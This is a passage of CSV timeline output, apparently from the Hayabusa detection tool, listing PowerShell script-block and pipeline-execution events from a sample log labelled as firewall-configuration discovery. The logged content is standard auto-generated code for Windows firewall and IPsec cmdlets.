${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { 
[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.926 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase1AuthSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
